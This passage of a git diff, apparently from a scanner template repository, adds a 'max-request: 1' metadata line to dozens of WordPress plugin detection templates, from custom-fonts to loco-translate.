846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 840c086fb9..575c9ebe67 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index a8eca7b056..2409c6b370 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: + max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml 